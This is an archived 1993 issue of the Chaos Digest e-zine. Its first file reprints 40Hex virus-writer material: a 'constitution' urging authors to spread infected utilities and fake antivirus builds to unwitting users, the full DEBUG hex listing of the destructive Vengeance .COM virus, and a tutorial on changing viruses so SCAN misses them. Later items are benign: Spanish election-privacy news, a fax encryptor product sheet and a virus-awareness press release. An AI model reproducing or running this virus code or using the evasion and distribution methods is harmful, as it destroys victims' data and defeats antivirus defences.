home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KAOS1_47.ZIP / KAOS1-47
Text File  |  1993-06-13  |  27KB  |  618 lines

  1. Chaos Digest                Mardi 8 Juin 1993        Volume 1 : Numero 47
  2.                              ISSN  1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.47 (8 Juin 1993)
  9. File 1--File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint)
  10. File 2--Elections espagnoles et libertes des donnees (news)
  11. File 3--SurFax, boitier de securisation des telecopies (produit)
  12. File 4--_Computer Virus Awareness Day_ briefing's (communique)
  13.  
  14. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  15. available at no cost by sending a message to:
  16.                 linux-activists-request@niksula.hut.fi
  17. with a mail header or first line containing the following informations:
  18.                     X-Mn-Admin: join CHAOS_DIGEST
  19.  
  20. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  21. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  22. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  23. groups.
  24.  
  25. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
  26. 466893.  Back issues of ChaosD can be found on the Internet as part of the
  27. Computer underground Digest archives. They're accessible using anonymous FTP:
  28.  
  29.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  30.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  31.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  32.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  33.         * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
  34.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  35.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  36.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  37.  
  38. CHAOS DIGEST is an open forum dedicated to sharing French information among
  39. computerists and to the presentation and debate of diverse views. ChaosD
  40. material may be reprinted for non-profit as long as the source is cited.
  41. Some authors do copyright their material, and they should be contacted for
  42. reprint permission.  Readers are encouraged to submit reasoned articles in
  43. French, English or German languages relating to computer culture and
  44. telecommunications.  Articles are preferred to short responses.  Please
  45. avoid quoting previous posts unless absolutely necessary.
  46.  
  47. DISCLAIMER: The views represented herein do not necessarily represent
  48.             the views of the moderators. Chaos Digest contributors
  49.             assume all responsibility for ensuring that articles
  50.             submitted do not violate copyright protections.
  51.  
  52. ----------------------------------------------------------------------
  53.  
  54. Date: Tue May 11 09:24:40 PDT 1993
  55. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  56. Subject: File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint)
  57.  
  58.  
  59. 40Hex Number 5 Volume 2 Issue 1                                  File 005
  60.  
  61.                 ___________________________________________
  62.                 The Constitution of Worldwide Virus Writers
  63.                 ___________________________________________
  64.                     Initial Release - February 12, 1992
  65.                 ___________________________________________
  66.  
  67.      We, the members of PHALCON/SKISM, in order to form a more perfect
  68. environment worldwide for the virus community, establish justice, ensure
  69. intracommunity tranquility, provide for the common defense and offense,
  70. promote the general welfare, and secure the blessings of liberty to
  71. ourselves and our posterity, do ordain and establish this Constitution of
  72. Worldwide Virus Writers.
  73.  
  74. ARTICLE I - REGARDING ORIGINAL VIRII
  75.      Section A - DEFINITION
  76.           The term "original virus" herein indicates programming done
  77.           exclusively by either one individual or group, with no code
  78.           taken from any other source, be it a book or another virus.
  79.      Section B - CODE REQUIREMENTS
  80.           For an original virus to conform to the standards set by
  81.           this document, it must include the following:
  82.             1) The title of the virus in square brackets followed by a
  83.                zero byte should be in the code, in a form suitable for
  84.                inclusion into SCAN(1).  This is to ensure that the
  85.                name of the virus is known to those examining it.
  86.             2) The name of the author and his/her group affilition/s
  87.                should be included in the code, followed by a zero
  88.                byte.  At the present, this is an optional requirement.
  89.             3) Some form of encryption or other form of stealth
  90.                techniques must be used.  Even a simple XOR routine
  91.                will suffice.
  92.             4) If the virus infects files, the code should be able to
  93.                handle infection of read only files.
  94.             5) It must have some feature to distinguish it from other
  95.                virii.  Creativity is encouraged above all else.
  96.             6) The virus must not be detectable by SCAN.
  97.      Section C - IMPLEMENTATION
  98.           This section, and all sections hereafter bearing the heading
  99.           "IMPLEMENTATION" refer to the recommended method of
  100.           implementation of the suggestions/requirements listed in the
  101.           current article.
  102.             1) Virus_Name db '[Avocado]',0
  103.             2) Author     db 'Dark Angel, PHALCON/SKISM',0
  104.  
  105. ARTICLE II - REGARDING "HACKED" VIRII
  106.      Section A - DEFINITION
  107.           The term "hacked virus" herein refers to any virus written
  108.           by either one individual or a group which includes code
  109.           taken from any other source, be it a book, a code fragment,
  110.           or the entire source code from another virus.
  111.           The term "source virus" herein refers to the virus which
  112.           spawned the "hacked virus."
  113.      Section B - CODE REQUIREMENTS
  114.           For a "hacked" virus to conform to the standards set forth
  115.           by this document, it must include the following, in addition
  116.           to all the requirements set down in Article I of this
  117.           document:
  118.             1) The title, author (if available), and affiliation of
  119.                the author (if available) of the original virus.
  120.             2) The author of the hacked virus must give the source
  121.                code of said virus to the author of the source virus
  122.                upon demand.
  123.             3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
  124.                Avenger hacks are to be written.
  125.             4) The source virus must be improved in some manner
  126.                (generally in efficiency of speed or size).
  127.             5) The hacked virus must significantly differ from the
  128.                source virus, i.e. it cannot be simply a text change.
  129.      Section C - IMPLEMENTATION
  130.             1) Credit db 'Source stolen from Avocado by Dark Angel of
  131.                PHALCON/SKISM',0
  132.  
  133. ARTICLE III - REGARDING VIRAL STRAINS
  134.      Section A - DEFINITION
  135.           The term "viral strain" herein refers to any virus written
  136.           by the original author which does not significantly differ
  137.           from the original.  It generally implies a shrinking in code
  138.           size, although this is not required.
  139.      Section B - CODE REQUIREMENTS
  140.           For a "viral strain" to conform to the standards set by this
  141.           document, it must include the following, in addition to all
  142.           the requirements set down in Article I of this document:
  143.             1) The name of the virus shall be denoted by the name of
  144.                the original virus followed by a dash and the version
  145.                letter.
  146.             2) The name of the virus must not change from that of the
  147.                original strain.
  148.             3) A maximum of two strains of the virus can be written.
  149.      Section C - IMPLEMENTATION
  150.             1) Virus_Name db '[Avocado-B]',0
  151.  
  152. ARTICLE IV - DISTRIBUTION
  153.      Section A - DEFINITION
  154.           The term "distribution" herein refers to the transport of
  155.           the virus through an infected file to the medium of storage
  156.           of a third (unwitting) party.
  157.      Section B - INFECTION MEDIUM
  158.           The distributor shall infect a file with the virus before
  159.           uploading.  Suggested files include:
  160.             1) Newly released utility programs.
  161.             2) "Hacked" versions of popular anti-viral software, i.e.
  162.                the version number should be changed, but little else.
  163.             3) Beta versions of any program.
  164.           The infected file, which must actually do something useful,
  165.           will then be uploaded to a board.  The following boards are
  166.           fair game:
  167.             1) PD Boards
  168.             2) Lamer boards
  169.             3) Boards where the sysop is a dick
  170.           No virus shall ever be uploaded, especially by the author,
  171.           directly to an antivirus board, such as HomeBase or
  172.           Excalibur.
  173.      Section C - BINARY AND SOURCE CODE AVAILABILITY
  174.           The binary of the virus shall not be made available until at
  175.           least two weeks after the initial (illicit) distribution of
  176.           the virus.  Further, the source code, which need not be made
  177.           available, cannot be released until the latest version of
  178.           SCAN detects the virus.  The source code, should it be made
  179.           available, should be written in English.
  180.      Section D - DOCUMENTATION
  181.           Documentation can be included with the archive containing
  182.           the binary of the virus, although this is optional.  The
  183.           author should include information about the virus suitable
  184.           for inclusion in the header of VSUM(2).  A simple
  185.           description will follow, though the author need not reveal
  186.           any "hidden features" of the virus.  Note this serves two
  187.           purposes:
  188.             1) Enable others to effectively spread the virus without
  189.                fear of self-infection.
  190.             2) Ensure that your virus gets a proper listing in VSUM.
  191.  
  192. ARTICLE V - AMENDMENTS
  193.      Section A - PROCEDURE
  194.           To propose an amendment, you must first contact a
  195.           PHALCON/SKISM member through one of our member boards.
  196.           Leave a message to one of us explaining the proposed change.
  197.           It will then be considered for inclusion.  A new copy of the
  198.           Constitution will then be drafted and placed on member
  199.           boards under the filename "PS-CONST.TXT" available for free
  200.           download by all virus writers.  Additionally, an updated
  201.           version of the constitution will be published periodically
  202.           in 40HEX.
  203.      Section B - AMENDMENTS
  204.           None as of this writing.
  205.  
  206. ARTICLE VI - MISCELLANEOUS
  207.      Section A - WHO YOU CAN MAKE FUN OF
  208.           This is a list of people who, over the past few years, have
  209.           proved themselves to be inept and open to ridicule.
  210.             1) Ross M. Greenberg, author of FluShot+
  211.             2) Patricia (What's VSUM?) Hoffman.
  212.             2) People who post "I am infected by Jerusalem, what do I
  213.                do?" or "I have 20 virii, let's trade!"
  214.             3) People who don't know the difference between a virus
  215.                and a trojan.
  216.             4) Lamers and "microwares puppies"
  217.      Section B - WHO YOU SHOULDN'T DIS TOO BADLY
  218.           This is a list of people who, over the past few years, have
  219.           proved themselves to be somewhat less inept and open to
  220.           ridicule than most.
  221.             1) John McAfee, nonauthor of SCAN
  222.             2) Dennis, true author of SCAN
  223.      Section C - MOTIVATION
  224.           In most cases, the motivation for writing a virus should not
  225.           be the pleasure of seeing someone else's system trashed, but
  226.           to test one's programming abilities.
  227. __________
  228.   1 SCAN is a registered trademark of McAfee Associates.
  229.   2 VSUM is a registered trademark of that bitch who doesn't know her own
  230.     name.
  231.  
  232. +++++
  233.  
  234. 40Hex Number 5 Volume 2 Issue 1                                     File 006
  235. ----------------------------------------------------------------------------
  236. PHALCON/SKISM Vengeance virus.                            Released  02/03/92
  237. Stats: Non-Resident .COM infector.                        in 40Hex Vmag
  238.        Infects files larger than 1992 bytes
  239.        Size of the virus is about 722 bytes
  240.  
  241.  
  242. Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was
  243.       online up until January 20th, 1992.  On that fateful day, the BBS
  244.       computer was confiscated by local authorities. Hopefully the board will
  245.       come back up, and be as good as before...
  246.  
  247. This virus activates the 20th of every month. Just for the fun of it, I'm not
  248. going to tell you what this thing does upon activation. I will say one thing
  249. unless you have suicidal tendencies, DON'T test it on your own machine, OR
  250. the machine of someone you love.  It ain't pretty.  It IS destructive. (286+)
  251. It IS noisy.  And it IS named appropriately.
  252.  
  253. Text that can be found in the virus:
  254.  
  255.                          *** Vengeance is ours! ***
  256.  
  257.                              PHALCON/SKISM '92
  258.  
  259. As of Scan 86, this virus isn't found.  Since it is based on the Violator
  260. virus, other scanners may find it.  Oh well.
  261.  
  262. Have fun with this one, just don't run it on the 20th...  at least, not on
  263. YOUR machine!
  264.  
  265.                         %%%% DecimatoR /PHALCON/SKISM %%%%
  266.  
  267. ---------------------------------------------------------------------------
  268. n veng.com
  269. e 0100  EB 0F 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  270. e 0110  90 51 BA 27 03 FC 8B F2 83 C6 3D BF 00 01 B9 03
  271. e 0120  00 F3 A4 8B F2 B8 0F FF CD 21 3D 01 01 75 03 E9
  272. e 0130  E3 01 06 B4 2F CD 21 89 5C 33 90 8C 44 35 07 BA
  273. e 0140  92 00 90 03 D6 B4 1A CD 21 90 06 56 8E 06 2C 00
  274. e 0150  BF 00 00 5E 56 83 C6 43 AC B9 00 80 F2 AE B9 04
  275. e 0160  00 AC AE 75 EE E2 FA 5E 07 89 7C 4E 8B FE 83 C7
  276. e 0170  52 8B DE 83 C6 52 8B FE EB 3D 83 7C 4E 00 75 03
  277. e 0180  E9 3F 01 1E 56 26 8E 1E 2C 00 90 8B FE 90 26 8B
  278. e 0190  75 4E 90 83 C7 52 90 90 AC 90 3C 3B 90 74 0B 90
  279. e 01A0  3C 00 74 03 AA EB F0 BE 00 00 5B 1F 89 77 4E 80
  280. e 01B0  FD 5C 74 03 B0 5C AA 89 7F 50 8B F3 83 C6 48 B9
  281. e 01C0  06 00 F3 A4 8B F3 B4 4E BA 52 00 03 D6 B9 03 00
  282. e 01D0  CD 21 EB 04 B4 4F CD 21 73 02 EB 9E 8B 84 A8 00
  283. e 01E0  24 1C 3C 1C 74 EE 81 BC AC 00 2D F7 77 E6 81 BC
  284. e 01F0  AC 00 C8 07 72 DE 8B 7C 50 56 81 C6 B0 00 AC AA
  285. e 0200  3C 00 75 FA 5E B8 00 43 BA 52 00 03 D6 CD 21 89
  286. e 0210  4C 3B B8 01 43 83 E1 FE BA 52 00 03 D6 CD 21 B8
  287. e 0220  02 3D BA 52 00 03 D6 CD 21 73 03 E9 87 00 8B D8
  288. e 0230  B8 00 57 CD 21 89 4C 37 89 54 39 B4 2C CD 21 B4
  289. e 0240  3F B9 03 00 BA 3D 00 03 D6 CD 21 72 53 3D 03 00
  290. e 0250  75 4E B8 02 42 B9 00 00 BA 00 00 CD 21 72 41 8B
  291. e 0260  C8 2D 03 00 89 44 41 81 C1 16 03 8B FE 81 EF 14
  292. e 0270  02 89 0D B4 40 B9 D3 02 8B D6 81 EA 16 02 CD 21
  293. e 0280  72 1E 3D D3 02 75 19 B8 00 42 B9 00 00 BA 00 00
  294. e 0290  CD 21 72 0C B4 40 B9 03 00 8B D6 83 C2 40 CD 21
  295. e 02A0  8B 54 39 8B 4C 37 83 E1 E0 83 C9 1C B8 01 57 CD
  296. e 02B0  21 B4 3E CD 21 B8 01 43 8B 4C 3B BA 52 00 03 D6
  297. e 02C0  CD 21 1E B4 1A 8B 54 33 8E 5C 35 CD 21 1F B4 2A
  298. e 02D0  CD 21 80 FA 14 75 3E B4 09 8B D6 83 C2 00 CD 21
  299. e 02E0  BA 80 00 32 ED B4 05 CD 13 80 FE 01 74 04 FE C6
  300. e 02F0  EB F3 80 FD 20 74 06 32 F6 FE C5 EB E8 80 FA 81
  301. e 0300  74 06 B2 81 32 F6 EB DB B8 09 25 CD 21 B4 02 B2
  302. e 0310  07 CD 21 EB F8 59 33 C0 33 DB 33 D2 33 F6 BF 00
  303. e 0320  01 57 33 FF C2 FF FF 0D 0A 2A 2A 2A 20 56 65 6E
  304. e 0330  67 65 61 6E 63 65 20 69 73 20 6F 75 72 73 21 20
  305. e 0340  2A 2A 2A 0D 0A 24 20 53 4B 49 53 4D 2F 50 68 61
  306. e 0350  6C 63 6F 6E 20 27 39 32 20 24 00 00 00 00 00 00
  307. e 0360  00 00 00 00 CD 20 90 E9 00 00 50 41 54 48 3D 2A
  308. e 0370  2E 43 4F 4D 00 00 00 00 00 00 00 00 00 00 00 00
  309. e 0380  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  310. e 0390  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  311. e 03A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  312. e 03B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  313. e 03C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  314. e 03D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  315. e 03E0  00 00 00 00
  316. rcx
  317. 03E3
  318. w
  319. q
  320.  
  321. +++++
  322.  
  323. 40Hex Number 5 Volume 2 Issue 1                                    File 007
  324.  
  325.                 HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT
  326.                                 PART II
  327.  
  328.  
  329. In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly
  330. tedious) method of searching for scan strings.  In short, this was his
  331. method:
  332.  
  333.   1) Make a small carrier file.
  334.   2) Infect the carrier with the virus.
  335.   3) Fill parts of the virus with a dummy value until you isolate the
  336.      scan string.
  337.   4) Modify the virus so it is not detectable, i.e. switch the order of
  338.      the instructions.
  339.  
  340. The problem is, of course, that step 3 takes a maddeningly inordinate
  341. amount of time.  I shall present a tip which will save you much time.
  342. The trick is, of course, to find out where the encryption mechanism and
  343. hence the unencrypted portion where the scan string is usually located.
  344. Once the encryption mechanism is located, isolating the scan string is
  345. much simpler.
  346.  
  347. Of course, the problem is finding the encryption mechanism in the first
  348. place.  The simplest method of doing this is using V Communication's
  349. Sourcer 486, or any similar dissassembler.  Dissassemble the file and
  350. search for the unencrypted portions.  Most of the file will be DBs, so
  351. search for any part which isn't.  Once you have located those parts, all
  352. you have to do is subtract 100h from the memory location to find its
  353. physical offset in the file.  You now have a general idea of where the
  354. scan string is located, so perform step 3 until you find it.
  355.  
  356. Ack, you say, what if you don't have Sourcer?  Well, all is not lost.
  357. Load up the infected carrier in good old DEBUG.  The first instruction
  358. (in COM infections) should be a JMP.  Trace (T) into the JMP and you
  359. should be thrown into the area around the encryption mechanism.  Use the
  360. memory offset (relative to the PSP segment) and subtract 100h to find
  361. the physical location of the unencrypted portion in the file.  Once
  362. again, once you have this, perform step 3.  Simple, no?
  363.  
  364. Sometimes, SCAN looks for the writing portion of the code, which
  365. generally calls INT 21h, function 40h.  This is usually, though not
  366. always, located somewhere near the encryption mechanism.  If it is
  367. not near there, all you have to do is trace through the virus until
  368. it calls the write file function.
  369.  
  370. Another method of looking for scan codes is to break the infected carrier
  371. file into a series of 50 byte overlapping chunks.  For example, the first
  372. chunk would be from offset 0 to 49, the second from 24 to 74, the third
  373. from 49 to 99, etc.  Then use SCAN to see which chunk holds the scan code.
  374. This is by far the easiest, not to mention quickest, method.
  375.  
  376. One side note on step 1, making the carrier file.  Some virii don't
  377. infect tiny files.  What you must do is create a larger file (duh).
  378. Simply assemble the following two lines:
  379.  
  380.     int 20h
  381.     db  98 dup (0)
  382.  
  383. (with all the garbage segment declarations and shit, of course) and
  384. you'll have a nice 100 byte carrier which should be sufficient in most
  385. cases, with maybe the exception of the Darth Vaders.
  386.  
  387. Enjoy!
  388.                                                                Dark Angel
  389.  
  390. ------------------------------
  391.  
  392. Date: Mon Jun  7 22:05:44 -0100 1993
  393. From: rfcalvo@guest2.atimdr.es (Rafael Fernandez Calvo )
  394. Subject: File 2--Elections espagnoles et libertes des donnees (news)
  395.  
  396.  
  397.     CCCCC  LL     II
  398.    CC      LL     II
  399.    CC      LL     II    --  N E W S   FROM   S P A I N  --- June 7, 1993
  400.     CCCCC  LLLLLL II
  401.  
  402.  COMMISSION for LIBERTIES
  403.  and INFORMATICS (*)
  404.  
  405.          PRIVACY AND GENERAL ELECTIONS: TRICKS OF THE TRADE
  406.          ++++++++++++++++++++++++++++++++++++++++++++++++++
  407.  
  408.      Spain held general parlamentary elections yesterday, June 6th.
  409. Regardless of the ocutcome (the ruling Socialist Party obtained again
  410. a majority of the seats), one of the parties participating in the
  411. event, "Centrist Unity-Spanish Democratic Party", was expelled of the
  412. race on June 1 by the Electoral Control Committee on the grounds that
  413. the party was actually a sham put up by a group of direct marketing
  414. pirates. It is not the first time it happens but it is the first time
  415. corrective actions are taken again such violations.
  416.  
  417.      Regardless of the fact that this party had no choice whatsoever
  418. of winning a single seat, it showed again one of the problems
  419. that has been plaguing citizens' privacy in Spain since 1977 (first
  420. democratic elections after forty years of dictatorship): the use for
  421. commercial purposes of the magnetic tapes containing the Election
  422. Census, provided to the parties by the Public Administration.
  423.  
  424.      Big parties do not seem to have participated in data smuggling
  425. practices but there is evidence that many of the companies that process
  426. the tapes provided by them are the main source of abuse against the
  427. privacy of citizens in regard to their personal data in Spain, since they
  428. duplicate and sell the tapes. This fact has been frequently dennounced by
  429. CLI (*).
  430.  
  431.      The recently approved Personal Data Law could help to stop these
  432. practices.
  433.  
  434. * SOME WORDS ABOUT CLI
  435.  
  436.      The --Commission for Liberties and Informatics, CLI-- is an independent
  437. and pluralistic organization that was officially constituted in April'91.
  438.  
  439.      Its mission is to "promote the development and protection of citizens'
  440. rights, specially privacy, against misuse of Information Technologies".
  441.  
  442.      As of May '93, CLI is composed by nine organizations, with a joint
  443. membership of about 3,000,000 people. They cover a very wide spectrum of
  444. social interest groups: associations of computer professionals, judges,
  445. civil rights leagues, trade unions, consumers groups, direct marketing
  446. industry, etc.
  447.  
  448.      CLI is confederated with similar bodies created in some other Spanish
  449. Regions such as Valencia, Basque Country and Catalonia, and has fluid
  450. working relationships with many public and private Data Protection bodies
  451. and entities all over the world, including CNIL, CPSR and Privacy
  452. International.
  453.  
  454.      CLI has its headquarters in:
  455.  
  456. Padilla 66, 3 dcha.
  457. E-28006 Madrid, Spain
  458.  
  459. Phone: (34-1) 402 9391
  460. Fax: (34-1) 309 3685
  461. E-mail: rfcalvo@guest2.atimdr.es
  462.  
  463. ------------------------------
  464.  
  465. Date: Tue Jun  8 06:06:17 EDT 1993
  466. From: celma_s@epita.fr (Samuel Celma )
  467. Subject: File 3--SurFax, boitier de securisation des telecopies (produit)
  468.  
  469.  
  470.                                 SURFAX
  471.  
  472.          High Security Encryption System for Facsimile Communication
  473.  
  474.  
  475. * Connected between any GIII facsimile equipment and the telephone line;
  476. * Use a high performance crypto algorithm (2'(59) = 10'(18) possible
  477.   cipher keys);
  478. * Designed for finance, commercial and industrial operations;
  479. * very easy and friendly handling.
  480.  
  481. SurFax, used on both side of the PSTN with group 3 fax, provides security
  482. for all the transmitted documents.
  483.  
  484. Installation
  485. +------------
  486.  
  487.   +-----+    +--------+         +--------1         +--------+    +-----+
  488.   | Fax |====| Surfax |=====>   |  PSTN  |   <=====| Surfax |====| Fax |
  489.   +-----+    +--------+         +--------+         +--------+    +-----+
  490.  
  491. Simply plugin and add-on
  492. No modification required to the fax equipment
  493.  
  494.  
  495. Operation
  496. +---------
  497.  
  498. 10-key keyboard
  499. 16 digits LCD display
  500. Secret key handling with keyboard
  501. Plain mode / encryption mode selectable with keyboard and hardkey
  502. Dimensions: 16 x 20 x 12 cm
  503. Weight: approx. 1.3 kg
  504. Power: 110/200 VAC, 50/60 Hz
  505.  
  506.  
  507. Facsimile Technical Specifications
  508. +----------------------------------
  509.  
  510. Two facsimile modems
  511. Transmission speed: 9600/7200/4800/2400 bit/s
  512.                     (CCITT V29, V27ter, V21)
  513. Designed to work with Group III facsimile equipments
  514. Fully compatible for transmission to non-crypto fax equipment (T30 protocol)
  515.  
  516.  
  517. Security Features
  518. +-----------------
  519.  
  520. SurFax is a secret key system type.
  521.  
  522. (1) KEY MANAGEMENT
  523.  
  524. The system has an integrated key management.  The user has to enter his 8
  525. figures secret key on keyboard.  A physical key allows the user to let
  526. Surfax in the chosen mode (plain or cipher).
  527.  
  528.      Otherwise, secret key can be erased at any time at the touch of a button,
  529. and is automatically erased after each communication.  A 32-bit session key is
  530. generated by a "built-in" random number generator.
  531.  
  532.      Both secret and session keys are combined into a cypher key (2'(59)
  533. possible values) on each terminal.  Both secret and session keys are never
  534. transferred in clear between the two terminals.  A new cypher key is created
  535. for each transmitted page.  Closed user groups can be created by request to
  536. the manufacturer (by setting a customer specific parameter).
  537.  
  538. (2) CIPHER TECHNOLOGY
  539.  
  540. The K.E.A. (KTT Encryption Algorithm) is KTT proprietary.  It is a realtime
  541. data ciphering process and is used to encrypt only the facsimile data.
  542.  
  543.      It is based on a random generator, which initial state relies on a cipher
  544. key, issued from a secret key and a session key (2'(59)).
  545.  
  546.  
  547. More informations
  548. +-----------------
  549.  
  550. Mr David COHEN
  551. SKTT Henry Kam Technologies & Telecommunations
  552. 2d rue de l'Epine Prolongee
  553. 93541 Bagnolet Cedex
  554. Phone: +33 1 42 87 54 00
  555. Fax:   +33 1 42 87 23 91
  556.  
  557. ------------------------------
  558.  
  559. Date: Tue Jun  8 06:06:17 EDT 1993
  560. From: ae446@freenet.carleton.ca (Nigel Allen )
  561. Subject: File 4--_Computer Virus Awareness Day_ briefing's (communique)
  562.  
  563.  
  564. Press Release
  565. from the National Computer Security Association.
  566.  
  567. Rep. Fields to sponsor Computer Virus Awareness Day briefing;
  568. Rep. Markey to speak to NCSA
  569.  To: Assignment Desk, Daybook Editor
  570.  Contact: Larry Teien of 3M Data Storage Products, St. Paul, Minn.,
  571.           612-736-5961, or
  572.           Bob Bales of the National Computer Security Association,
  573.           Carlisle, Pa., 717-258-1816, or
  574.           Ken Greenberg of Fleishman-Hillard Inc., Los Angeles,
  575.           213-629-4974
  576.  
  577. News Advisory:
  578.  
  579. WHAT:     National Computer Virus Awareness Day
  580.  
  581.           Congressional briefing on the virus threat and recommended
  582.           remedial action, sponsored by Rep. Jack Fields (R-Texas),
  583.           ranking Republican on the House Subcommittee on
  584.           Telecommunications and Finance; and an informational
  585.           exhibit about computer virus control and information
  586.           security.
  587.  
  588. WHERE:    Rayburn House Office Building, Washington, D.C.,
  589.           Room 2257
  590.  
  591. WHEN:     Wednesday, June 9
  592.  
  593.           8:30 a.m. to 9:30 a.m. -- Panelist presentations
  594.           9:30 a.m. to 10:30 a.m. -- Media Q&A
  595.  
  596. WHO:      Co-sponsored by 3M Co. and the National Computer Security
  597.           Association (NCSA).  Endorsed by the American Electronics
  598.           Association, the Electronic Industries Association and the
  599.           Microcomputer Managers Association.
  600.  
  601.           Panel members to include representatives of NYNEX,
  602.           Rockwell International and the Departments of Justice
  603.           and Defense, as well as 3M and NCSA.
  604.  
  605. ALSO:     3M/NCSA Congressional dinner, featuring Rep. Edward J.
  606.           Markey (D-Mass.), chairman of the House Subcommittee
  607.           on Telecommunications and Finance.
  608.  
  609.           Cotillion Room, Sheraton Washington Hotel
  610.           2660 Woodley Road N.W.; 7:45 p.m. on June 10
  611. --
  612. Nigel Allen, Toronto, Ontario, Canada  ae446@freenet.carleton.ca
  613.  
  614. ------------------------------
  615.  
  616. End of Chaos Digest #1.47
  617. ************************************
  618.